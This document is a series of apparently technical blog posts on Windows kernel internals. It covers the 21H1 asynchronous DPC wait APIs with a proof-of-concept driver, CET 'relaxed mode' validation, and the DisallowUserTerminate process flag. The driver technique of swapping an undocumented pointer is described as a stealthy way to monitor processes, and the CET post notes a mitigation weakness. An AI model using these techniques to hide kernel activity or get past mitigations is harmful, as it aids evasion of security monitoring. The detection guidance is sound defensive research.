All those functions are part of a new and interesting functionality – the ability to wait on an (event) object and to execute a DPC when it becomes signaled. Until now, if a driver wanted to wait on an object it had to do so synchronously – the current thread would be put in a wait state until the object that is waited on was signaled, or the wait timed out (or an APC executed, if the wait was alertable). User mode applications typically perform waits in the same manner, however, since Windows 8, they’ve also have had the ability to perform asynchronous waits through the Thread Pool API. This new functionality associates an I/O Completion Port with a “Wait Packet”, obviating the need to have a waiting thread.

The change in 21H1, through the addition of these APIs, marks a major change for kernel-mode waits by introducing kernel-mode asynchronous waits: a driver can now supply a DPC that will be executed when the event object that is waited on is signaled all while continuing its execution in the meantime.

The Mechanism

To use this new capability, a driver must first  initialize a so-called “DPC Event”. To initialize this structure we have the new API ExCreateDpcEvent:

NTSTATUS
ExCreateDpcEvent (
    _Outptr_ PVOID *DpcEvent,
    _Outptr_ PKEVENT *Event,
    _In_ PKDPC Dpc
);

Internally, this allocates a new undocumented structure that I chose to call DPC_WAIT_EVENT:

typedef struct _DPC_WAIT_EVENT
{
    KWAIT_BLOCK WaitBlock;
    PKDPC Dpc;
    PKEVENT Event;
} DPC_WAIT_EVENT, *PDPC_WAIT_EVENT;

This API receives a DPC that the caller must have previously initialized with KeInitializeDpc (you can guess who spent a day debugging things by forgetting to do this), and in turn creates an event object and allocates a DPC_WAIT_EVENT structure that is returned to the caller, filling in a pointer to the caller’s DPC, the newly allocated event, and setting the wait block state to WaitBlockInactive.

Then, the driver needs to call the new ExQueueDpcEventWait function, passing in the structure:

BOOLEAN
ExQueueDpcEventWait (
    _In_ PDPC_WAIT_EVENT DpcEvent,
    _In_ BOOLEAN QueueIfSignaled
    )
{
    if (DpcEvent->WaitBlock.BlockState != WaitBlockInactive)
    {
        RtlFailFast(FAST_FAIL_INVALID_ARG);
    }
    return KeRegisterObjectDpc(DpcEvent->Event,
                               DpcEvent->Dpc,
                               &DpcEvent->WaitBlock,
                               QueueIfSignaled);
}

As can be seen, this function is very simple – it unpacks the structure and sends the contents to the internal KeRegisterObjectDpc:

BOOLEAN
KeRegisterObjectDpc (
    _In_ PVOID Object,
    _In_ PRKDPC Dpc,
    _In_ PKWAIT_BLOCK WaitBlock,
    _In_ BOOLEAN QueueIfSignaled
);

You might wonder, like me – doesn’t the “e” in “Ke” stand for “exported”? Was I lied to the whole time? Is this a mistake? Was this a last minute change? Does MS not have any design or code review? I’m as confused as you are.

But before talking about KeRegisterObjectDpc, we need to investigate another small detail. To enable this functionality, the KWAIT_BLOCK structure can now store a KDPC to queue, and the WAIT_TYPE enumeration has a new WaitDpc option:

typedef struct _KWAIT_BLOCK
{
    LIST_ENTRY WaitListEntry;
    UCHAR WaitType;
    volatile UCHAR BlockState;
    USHORT WaitKey;
#if defined(_WIN64)
    LONG SpareLong;
#endif
    union {
        struct KTHREAD* Thread;
        struct KQUEUE* NotificationQueue;
        struct KDPC* Dpc;
    };
    PVOID Object;
    PVOID SparePtr;
} KWAIT_BLOCK, *PKWAIT_BLOCK, *PRKWAIT_BLOCK;

typedef enum _WAIT_TYPE
{
    WaitAll,
    WaitAny,
    WaitNotification,
    WaitDequeue,
    WaitDpc,
} WAIT_TYPE;

Now we can look at KeRegisterObjectDpc, which is pretty simple and does the following:

  1. Initializes the wait block
    1. Sets the BlockState field to WaitBlockActive,
    2. Sets the WaitType field to WaitDpc
    3. Sets the Dpc field to point to the received DPC
    4. Sets the Object field to the received object.
  2. Raises the IRQL to DISPATCH_LEVEL
  3. Acquires the lock for the object, found in its DISPATCHER_HEADER.
  4. If the object is not signaled – inserts the wait block into the wait list for the object and releases the lock, then lowers the IRQL
  5. Otherwise, if the object is signaled:
    1. Satisfies the wait for the object, resetting the signal state as required for the object
    2. If the QueueIfSignaled parameter was set, goes to step 3
    3. Otherwise,
      1. Sets BlockState to WaitBlockInactive
      2. Queues the DPC
  • Releases the lock and calls KiExitDispatcher (which will lower the IRQL and make the DPC execute immediately).

Then the function returns. If the object was not signaled, the driver execution will continue and when the object gets signaled, the DPC will be executed. If the object is already signaled, the DPC will be executed immediately (unless the QueueIfSignaled parameter was set to TRUE)

If the wait is no longer needed, the driver should call ExCancelDpcEventWait to remove the wait block from the wait queue. And when the event is not needed it should call ExDeleteDpcEvent to dereference the event and free the opaque DPC_WAIT_EVENT structure.

Meanwhile, the various internal dispatcher functions that take care of signaling an object have been extended to handle the WaitDpc case – instead of unwaiting the thread (WaitAny/WaitAll), or waking up a queue waiter (WaitNotification), a call to KeInsertQueueDpc is now done for the WaitDpc case (since wait satisfaction is done at DISPATCH_LEVEL, the DPC will then immediately execute once KiExitDispatcher is called by one of these functions).

The Limitations

You might have noticed that while the functionality in KeRegisterObjectDpc is generic, all these structures and exported functions  only support an event object. Furthermore, when looking inside ExCreateDpcEvent, we can see that it only creates an event object:

status = ObCreateObject(KernelMode,
                        ExEventObjectType,
                        NULL,
                        KernelMode,
                        NULL,
                        sizeof(KEVENT),
                        0,
                        0,
                        &event);

But as KeRegisterObjectDpc suggests, an event is not the only object that can be asynchronously waited on. The usage of KiWaitSatisfyOther suggests that any generic dispatcher object, except for mutexes, which need to handle ownership rules, can be used. Since a driver might need to wait on a process, a thread, a semaphore, or any other object — why are we only allowed to wait on an event here?

The answer in this case is probably that this was not designed to be a generic feature available to all drivers. So far, I could only see one Windows component calling these new functions – Vid.sys (the Hyper-V Virtualization Infrastructure Driver) Digging deeper, it looks like it is using this new capability to implement the new WHvCreateTrigger  API added to the documented Hyper-V Platform API in WinHvPlatform.h. “Triggers” are a new exposed 21H1 functionality to send virtual interrupts to a Hyper-V Partition. The importance of Microsoft’s Azure/Hyper-V platform play is clearly evident here – low level changes to the kernel dispatcher, for the first time in a decade, simply to optimize the performance of virtual machine-related APIs.

As such, since it is only designed to support this one specific case, this feature is built to only wait on an event object. But even with that in mind, the design is a bit funny – ExCreateDpcEvent will create an event object and return it to the caller, which then has to re-open it with ObOpenObjectByPointer to use it in any way, since most wait-related APIs require a HANDLE (as does exposing the object to user-mode, as Vid.sys intends to do). And we can see vid.sys doing exactly that:

Why not simply expose KeRegisterObjectDpc and let it receive an object pointer that will be waited on, since this function doesn’t care about the object type? Why do we even need a new structure to manage this information? I don’t know. The current implementation doesn’t seem like the most logical one, and it limits the feature significantly, but it is the Microsoft way.

If I had to guess, I would expect to see this feature changing in the future to support more object types as Microsoft internally finds more uses for asynchronous waits in the kernel. I will not be surprised to see an ExQueueDpcEventWaitEx function added soon… and perhaps documenting this API to 3rd parties.

But not all is lost. If you’re willing to bend the rules a little and upset a few people in the OSR forums, you can wait on any non-mutex (dispatcher) object you want, simply by replacing the pointer inside the DPC_WAIT_EVENT structure that is returned back to you. Neither ExQueueDpcEventWait or KeRegisterObjectDpc care about which type of object is being passed in, as long as it’s a legitimate dispatcher object. I’m sure there’s an NT_ASSERT in the checked build, but it’s not like those still exist.

The risk here (as OSR people will gladly tell you) is that the new structure is undocumented and might change with no warning, as are the functions handling it. So, replacing the pointer and hoping that the offset hasn’t changed and that the functions will not be affected by this change is a risky choice that is not recommended in a production environment. Now that I’ve said it, I have no doubt we will see crash dumps caused by AV products attempting to do exactly that, poorly.

PoC

To demonstrate how this mechanism works and how it can be used for objects other than events I wrote a small driver that registers a DPC that waits for a process to terminate.

On DriverEntry, this driver initializes a push lock that will be used later. It also registers a process creation callback:

NTSTATUS
DriverEntry (
    _In_ PDRIVER_OBJECT DriverObject,
    _In_ PUNICODE_STRING RegistryPath
    )
{
    DriverObject->DriverUnload = DriverUnload;
    ExInitializePushLock(&g_WaitLock);
    return PsSetCreateProcessNotifyRoutineEx(&CreateProcessNotifyRoutineEx, FALSE);
}

Whenever our CreateProcessNotifyRoutineEx callback is called, it checks if the new process name ends with “cmd.exe”:

VOID
CreateProcessNotifyRoutineEx (
    _In_ PEPROCESS Process,
    _In_ HANDLE ProcessId,
    _In_ PPS_CREATE_NOTIFY_INFO CreateInfo
    )
{
    NTSTATUS status;
    DECLARE_CONST_UNICODE_STRING(cmdString, L"cmd.exe");

    UNREFERENCED_PARAMETER(ProcessId);

    //
    // If process name is cmd.exe, create a dpc
    // that will wait for the process to terminate
    //
    if ((!CreateInfo) ||
        (!RtlSuffixUnicodeString(&cmdString, CreateInfo->ImageFileName, FALSE)))
    {
        return;
    }
    ...
}

If the process is cmd.exe, we will create a DPC_WAIT_EVENT structure that will wait for the process to be signaled, which happens when the process terminates. For the purpose of this PoC I wanted to keep things simple and avoid having to keep track of multiple wait blocks. So only the first cmd.exe process will be waited on and the rest will be ignored.

First, we need to declare some global variables for the important structures, as well as the lock that we initialized on DriverEntry and the DPC routine that will be called when the process terminates:

static KDEFERRED_ROUTINE DpcRoutine;
PDPC_WAIT_EVENT g_DpcWait;
EX_PUSH_LOCK g_WaitLock;
KDPC g_Dpc;
PKEVENT g_Event;

static
void
DpcRoutine (
    _In_ PKDPC Dpc,
    _In_ PVOID DeferredContext,
    _In_ PVOID SystemArgument1,
    _In_ PVOID SystemArgument2
    )
{
    DbgPrintEx(DPFLTR_IHVDRIVER_ID,
               DPFLTR_ERROR_LEVEL,
               "Process terminated\n");
}

Then, back in our process creation callback, we will initialize the DPC object and allocate a DPC_WAIT_EVENT structure using KeInitializeDpc and ExCreateDpcEvent. To avoid a race we will use our lock.

void
CreateProcessNotifyRoutineEx (
    ...
    )
{
    ...
    ExAcquirePushLockExclusive(&g_WaitLock);
    if (g_DpcWait == nullptr)
    {
        KeInitializeDpc(&g_Dpc, DpcRoutine, &g_Dpc);
        status = ExCreateDpcEvent(&g_DpcWait,&g_Event,&g_Dpc);
        if (!NT_SUCCESS(status))
        {
            DbgPrintEx(DPFLTR_IHVDRIVER_ID,
                       DPFLTR_ERROR_LEVEL,
                       "ExCreateDpcEvent failed with status: 0x%x\n",
                       status);
            ExReleasePushLockExclusive(&g_WaitLock);
            return;
        }
        ...
    }
    ExReleasePushLockExclusive(&g_WaitLock);
}

ExCreateDpcEvent creates an event object and places a pointer to it in our new DPC_WAIT_EVENT structure. But since we want to wait on a process, we need to replace that event pointer with the pointer to the EPROCESS of the new Cmd.exe process. Then we can go on to queue our wait block for the process:

void
CreateProcessNotifyRoutineEx (
    _In_ PEPROCESS Process,
    ...
    )
{
    NTSTATUS status;
    //
    // Only wait on one process
    //
    ExAcquirePushLockExclusive(&g_WaitLock);
    if (g_DpcWait == nullptr)
    {
        KeInitializeDpc(&g_Dpc, DpcRoutine, &g_Dpc);
        status = ExCreateDpcEvent(&g_DpcWait, &g_Event, &g_Dpc);
        if (!NT_SUCCESS(status))
        {
            DbgPrintEx(DPFLTR_IHVDRIVER_ID,
                       DPFLTR_ERROR_LEVEL,
                       "ExCreateDpcEvent failed with status: 0x%x\n",
                       status);
            ExReleasePushLockExclusive(&g_WaitLock);
            return;
        }
        NT_ASSERT(g_DpcWait->Object == g_Event);
        g_DpcWait->Object = (PVOID)Process;
        ExQueueDpcEventWait(g_DpcWait, TRUE);
    }
    ExReleasePushLockExclusive(&g_WaitLock);
}

And that’s it! When the process terminates our DPC routine will be called, and we can choose to do whatever we want there:

The only other thing we need to remember is to clean up after ourselves before unloading, by setting the pointer back to the event (that we saved for that purpose), canceling the wait and deleting the DPC_WAIT_EVENT structure:

VOID
DriverUnload (
    _In_ PDRIVER_OBJECT DriverObject
    )
{
    UNREFERENCED_PARAMETER(DriverObject);

    PsSetCreateProcessNotifyRoutineEx(&CreateProcessNotifyRoutineEx, TRUE);

    //
    // Change the DPC_WAIT_EVENT structure to point back to the event,
    // cancel the wait and destroy the structure
    //
    if (g_DpcWait != nullptr)
    {
        g_DpcWait->Object = g_Event;
        ExCancelDpcEventWait(g_DpcWait);
        ExDeleteDpcEvent(g_DpcWait);
    }
}

Forensics

Apart from the legitimate uses of asynchronous wait for drivers, this is also a new and stealthy way to wait on all different kinds of objects without using other, more well-known ways that are easy to notice and detect, such as using process callbacks to wait on process termination.

The main way to detect whether someone is using this technique is to inspect the wait queues of objects in the system. For example, let’s use the Windbg Debugger Data Model to inspect the wait queues of all processes in the system. To get a nice table view we’ll only show the first wait block for each process, though of course that doesn’t give us the full picture:

dx -g @$procWaits = @$cursession.Processes.Where(p => (__int64)&p.KernelObject.Pcb.Header.WaitListHead != (__int64)p.KernelObject.Pcb.Header.WaitListHead.Flink).Select(p => Debugger.Utility.Collections.FromListEntry(p.KernelObject.Pcb.Header.WaitListHead, "nt!_KWAIT_BLOCK", "WaitListEntry")[0]).Select(p => new { WaitType = p.WaitType, BlockState = p.BlockState, Thread = p.Thread, Dpc = p.Dpc, Object = p.Object, Name = ((char*)((nt!_EPROCESS*)p.Object)->ImageFileName).ToDisplayString("sb")})

We mostly see here waits of type WaitNotification (2), which is what we expect to see – user-mode threads asynchronously waiting for processes to exit. Now let’s run our driver and run a new query which will only pick processes that have wait blocks with type WaitDpc (4):

dx @$dpcwaits = @$cursession.Processes.Where(p => (__int64)&p.KernelObject.Pcb.Header.WaitListHead != (__int64)p.KernelObject.Pcb.Header.WaitListHead.Flink && Debugger.Utility.Collections.FromListEntry(p.KernelObject.Pcb.Header.WaitListHead, "nt!_KWAIT_BLOCK", "WaitListEntry").Where(p => p.WaitType == 4).Count() != 0)

[0x6b0]          : cmd.exe [Switch To]

Now we only get one result – the cmd.exe process that our driver is waiting on. Now we can dump its whole wait queue and see who is waiting on it. We will also use a little helper function to show us the symbol that the DPC’s DeferredRoutine is pointing to:

dx -r0 @$getsym = (x => Debugger.Utility.Control.ExecuteCommand(".printf\"%y\", " + ((__int64)x).ToDisplayString("x")))

dx -g Debugger.Utility.Collections.FromListEntry(@$dpcwaits.First().KernelObject.Pcb.Header.WaitListHead, "nt!_KWAIT_BLOCK", "WaitListEntry").Select(p => new { WaitType = p.WaitType, BlockState = p.BlockState, Thread = p.Thread, Dpc = p.Dpc, Object = p.Object, Name = ((char*)((nt!_EPROCESS*)p.Object)->ImageFileName).ToDisplayString("sb"), DpcTarget = (@$getsym(p.Dpc->DeferredRoutine))[0]})

Only one wait block is queued for this process and its pointing to our driver!

This analysis process can also be converted to JavaScript to have a bit more control over the presentation of the results, or to C to automatically check the wait queues of different objects (keep in mind it is extremely unsafe to do this at runtime due to the lock synchronization required – using the COM/C++ Debugger API to do forensics on a memory dump or live dump is the preferred way to go).

Conclusion

This new addition to the Windows kernel is exciting since it allows the option of asynchronous waits for drivers, a capability that only existed for user-mode until now. I hope we will see this extended to properly support more object types soon, making this feature generically useful to all drivers in various cases.

The implementation of all the functions discussed in this post can be found here.

Read our other blog posts:

CET Updates – CET on Xanax

Windows 21H1 CET Improvements

Since Alex and I first published our first analysis of CET, Windows’ support for user-mode CET received a few important changes that should be noted. We can easily spot most of them by looking at the changes to the MitigationFlags2 field of the EPROCESS, when comparing Windows 10 Build 19013 with 20226:

There are a lot of new mitigation flags here, and a few of them are related to CET:

  • CetUserShadowStackStrictMode – annoyingly, this does not mean the same thing as Strict CFG. Strict CET means that CET will be enforced for the process, regardless of whether it’s compiled as CET compatible or not.
  • BlockNonCetBinaries – as the name suggests, this feature blocks binaries that were not compiled with CET support from being loaded into the process — just like Strict CFG.
  • CetDynamicApisOutOfProcOnly – At first CET was supposed to block all non-approved RIP changes. That was too much, so it was toned down to only block most non-approved RIP targets. Then MS remembered dynamic memory, and couldn’t force dynamic memory to comply with CET but insisted that allowing dynamic targets was only supported out of proc, so not really a security risk. And now it seems that in proc dynamic APIs are allowed by default and processes have to manually opt-out of that by setting this flag. In their defense, the flag is already set for most important Windows processes such as winlogon.exe, lsass.exe, csrss.exe and svchost.exe. But I’m sure that’s OK and we’ll never see CET bypasses abusing dynamic APIs in proc.
  • UserCetSetContextIpValidationRelaxedMode – Even after all the adjustments that were made in order to not break any existing code, CET was still a bit too anxious, resulting in this new mitigation. This new flag has a pretty curious name that might draw your attention. If it did – good! Because this is the CET feature that this blog post will focus on.

But even without knowing the purpose of any of those, the amount of new CET flags alone hints that this we are not expected to see CET being fully enforced across the system any time soon.

Relaxed Mode

The least obvious of those new flags in the “relaxed mode” option. Was CET too anxious to handle 2020 and needed a bit of a break from everything? Well if it did, I think we can all relate to that and shouldn’t judge to harshly.

This flag can be set on process creation, by calling UpdateProcThreadAttribute with PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY and PROCESS_CREATION_MITIGATION_POLICY2_USER_CET_SET_CONTEXT_IP_VALIDATION_RELAXED_MODE as the mitigation policy flag.

It can also be set with a currently-undocumented linker flag, which will set the new IMAGE_DLLCHARACTERISTICS_EX_CET_SET_CONTEXT_IP_VALIDATION_RELAXED_MODE value in the PE header information (see the end of the post for the definition).

Once the flag is set, it is only used in two places – KeVerifyContextIpForUserCet and KiContinuePreviousModeUser. Both read it from the EPROCESS and pass a Boolean value into KiVerifyContextIpForUserCet to indicate whether it’s enabled or not. Inside KiVerifyContextIpForUserCet we can see this new addition that checks this argument:

RtlZeroMemory(&unwindState, sizeof(unwindState));
if (continueType == KCONTINUE_UNWIND)
{
    status = RtlVerifyUserUnwindTarget(userRip, KCONTINUE_UNWIND, &unwindState);
    if (NT_SUCCESS(status))
    {
        return status;
    }
}

if ((RelaxedMode != FALSE) && (continueType != KCONTINUE_RESUME))
{
    if (unwindState.CheckedLoadConfig == FALSE)
    {
        status = RtlGetImageBaseAndLoadConfig(userRip, &unwindState.ImageBase, &unwindState.LoadConfig);
        unwindState.CheckedLoadConfig = NT_SUCCESS(status) ? TRUE : unwindState.CheckedLoadConfig;
    }

    if (unwindState.CheckedLoadConfig != FALSE)
    {
        if (unwindState.ImageBase != NULL)
        {
            __try
            {
                ProbeForRead(unwindState.LoadConfig,
                             RTL_SIZEOF_THROUGH_FIELD(IMAGE_LOAD_CONFIG_DIRECTORY64, GuardEHContinuationCount),
                             sizeof(UCHAR));

                if ((unwindState.LoadConfig != NULL) &&
                    (unwindState.LoadConfig->Size >= RTL_SIZEOF_THROUGH_FIELD(IMAGE_LOAD_CONFIG_DIRECTORY64, GuardEHContinuationCount)) &&
                    (BooleanFlagOn(unwindState.LoadConfig->GuardFlags, IMAGE_GUARD_EH_CONTINUATION_TABLE_PRESENT)))
                {
                    goto CheckAddressInShadowStack;
                }
            }
            __except
            {
                goto CheckAddressInShadowStack;
            }
            return STATUS_SUCCESS;
        }
        return STATUS_SUCCESS;
    }
}

At first look, this might seem like a lot and could be confusing. But with some context it becomes a lot clearer. When implementing CET support, Microsoft ran into a problem. NtSetContextThread is widely used across the system by processes that don’t necessarily respect the new “rules” of CET, and might use it to set RIP to addresses that are not found in the shadow stack. Those processes might also unwind into addresses that are not considered valid by CET, and since they were not compiled with proper CET support they will not have Static nor Dynamic Exception Handler Continuation Targets (which we wrote about in the previous post) that are recognized by CET. It won’t be possible to enable CET across the system without breaking all those processes, some of which, like python, are very common. So, an option was added to “relax” CetSetContextIpValidation for those cases.

This check will be done for 2 continue types – all cases of KCONTINUE_SET, and cases of KCONTINUE_UNWIND where RtlVerifyUserUnwindTarget failed.

To know whether we are looking at such a case, KiVerifyContextIpForUserCet reads the IMAGE_LOAD_CONFIG_DIRECTORY structure from the headers of the module that contains the new RIP value. If the module has no image base, no load config or no Exception Handler Continuation Table, the function assumes that this is a module that is incompatible with CET and allows the action. But if the module has as Exception Handler Continuation Table, the new RIP value will be checked against the shadow stack, just as if relaxed mode would not have been enabled.

A fun side effect of this is that for any process where “relaxed mode” is enabled, setting the context or unwinding into JIT’ed code will always be permitted.

Load Config Directory Capturing

As part of this change MS also added a new UNWIND_STATE structure (that is our name, as this new structure is not in the public symbols) to hold the load configuration pointer and avoid reading the headers more than once. The new structure looks like this:

struct _UNWIND_STATE
{
    PVOID ImageBase;
    PIMAGE_LOAD_CONFIG_DIRECTORY64 LoadConfig;
    BOOLEAN CheckedLoadConfig;
} UNWIND_STATE, *PUNWIND_STATE;

The CheckedLoadConfig flag is used to indicate that the LoadConfig pointer is already initialized that does not need to be read again. We’ll leave it as an excercise for the reader as to why this change was introduced.

Forward-thinking Downgrades

As hardware supporting CET is about the be released and hopefully become common over the next few years, the Windows implementation of CET doesn’t seem to be fully prepared for the change and it looks like new challenges are only being discovered now. And judging by these “reserved” image flags, it seems that some developers are expecting more CET changes and downgrades in the future…

Read our other blog posts:

Critical, Protected, DUT Processes in Windows 10

We are all familiar with Microsoft’s love for creating new and exciting ways to prevent certain processes from being terminated by the user. First were Critical processes in Windows XP 64-bit and Server 2003, which crashed the kernel if you killed them. Then, came Protected Process Light (PPL) in Windows 8.1, which prevented you from killing them at all.  Perhaps it prevented too many other things too, because in a recent Windows 10 update, build 20161, we see yet another new addition to the EPROCESS flags (Flags3, actually), called DisallowUserTerminate:

As this flag’s name is pretty clear, its purpose doesn’t need much explanation – any process that has this flag set cannot be terminated from user-mode. We can see that in PspProcessOpen:

A user-mode caller can’t open a handle to a process that has the DisallowUserTerminate flag set if the requested access mask contains PROCESS_TERMINATE.

So where is this flag set, and does this mean you can protect your processes from termination? The answer to the second question is simple – not really. For now, this flag can only be set by one path, and it’s one specifically used for creating Hyper-V Memory Host (vmmem) processes.

Internally, this flag is set on process creation by PspAllocateProcess, based on the input parameter CreateFlags – flag 8 (let’s call it PSP_CREATE_PROCESS_FLAG_DISALLOW_TERMINATE) is what sets DisallowUserTerminate as you can see below:

Unfortunately, this function only has 2 external callers, which always pass in 0 as CreateFlags, which obviously doesn’t allow one to set any of these flags. The third, internal caller, is PsCreateMinimalProcess, which has a few internal uses in the system, such as the creation of Pico Processes used by WSL, and other special system processes such as “Memory Compression” and “Registry”. Minimal processes are also created by VmCreateMemoryProcesses, which is one of the APIs that’s exported through the VID Extension Host that myself, Gabrielle, and Alex described in our INFILTRATE 2020 talk.

Unlike the exported functions, the PsCreateMimimalProcess internal API receives the CreateFlags from its callers and forwards them to PspAllocateProcess, and VmCreateMemoryProcesses passes in PSP_CREATE_PROCESS_FLAG_DISALLOW_TERMINATE (0x8) unconditionally, as well as PSP_CREATE_PROCESS_FLAG_VM_PROCESSOR_HOST (0x4) if flag 0x20 (let’s call it VMP_CREATE_PROCESS_FLAG_VM_PROCESSOR_HOST) was sent to it. You can see this logic below:

As mentioned, looking for callers for this function in IDA will not show any results, because this function, which is not exported, is shared with Vid.sys through an extension host and called by VsmmNtSlatMemoryProcessCreate when new vmmem processes are needed to manage memory in virtual machines managed by Hyper-V, and/or to contain the Virtual Processor (VP) scheduler threads when eXtended Scheduling (XS) is enabled as part of Windows Defender Application Guard (WDAG), Windows Containers, or Windows Sandbox.

Checking the value of Flags3 in vmmem processes in the new build shows that DisallowUserTerminate is enabled for these processes, and:

Sadly, no other process can use this capability for now without manually editing the EPROCESS structure, which is extremely not recommended, as any code doing this is bound to break often and crash a lot of systems. So I’m sure 5 different AV companies are already adding code to it.

 

Read our other blog posts: